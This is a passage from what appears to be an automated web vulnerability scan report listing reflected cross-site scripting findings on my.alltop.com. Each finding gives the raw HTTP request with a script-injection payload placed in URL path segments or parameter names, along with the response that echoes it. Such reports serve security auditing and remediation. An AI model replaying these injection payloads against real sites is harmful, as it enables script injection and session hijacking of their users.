Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012C)%3C/script%3E67394"><script>alert(1)</script>c90d49d4144" method="post" accept-charset="utf-8">
...[SNIP]...

1.121. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87c16"><script>alert(1)</script>1bd323d712d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C87c16"><script>alert(1)</script>1bd323d712d/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C87c16"><script>alert(1)</script>1bd323d712d/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.122. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67c40"><script>alert(1)</script>8cf96fa2db2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C/style%3E%3C67c40"><script>alert(1)</script>8cf96fa2db2/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:33 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C/style%3E%3C67c40"><script>alert(1)</script>8cf96fa2db2/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.123. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fe5c"><script>alert(1)</script>d6e1cb712d0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C5fe5c"><script>alert(1)</script>d6e1cb712d0/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:34 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:34 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:34 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C5fe5c"><script>alert(1)</script>d6e1cb712d0/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.124. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9dcb"><script>alert(1)</script>1b77e34e5b3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3Ed9dcb"><script>alert(1)</script>1b77e34e5b3 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:35 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3Ed9dcb"><script>alert(1)</script>1b77e34e5b3" method="post" accept-charset="utf-8">
...[SNIP]...

1.125. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f253d"><script>alert(1)</script>62456625d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E?f253d"><script>alert(1)</script>62456625d17=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:27 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:27 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:27 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E?f253d"><script>alert(1)</script>62456625d17=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.126. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%22ns=%22netsparker(0x000191)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 610f9"><script>alert(1)</script>96010d42753 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g610f9"><script>alert(1)</script>96010d42753/%22ns=%22netsparker(0x000191) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:37 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:38 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:38 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g610f9"><script>alert(1)</script>96010d42753/%22ns=%22netsparker(0x000191)" method="post" accept-charset="utf-8">
...[SNIP]...

1.127. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%22ns=%22netsparker(0x000191)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1103"><script>alert(1)</script>39c215705e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g/%22nsd1103"><script>alert(1)</script>39c215705e7=%22netsparker(0x000191) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:41 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:41 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g/%22nsd1103"><script>alert(1)</script>39c215705e7=%22netsparker(0x000191)" method="post" accept-charset="utf-8">
...[SNIP]...

1.128. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%22ns=%22netsparker(0x000191)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53d96"><script>alert(1)</script>645dacf2bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g/%22ns=%22netsparker(0x000191)?53d96"><script>alert(1)</script>645dacf2bc=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
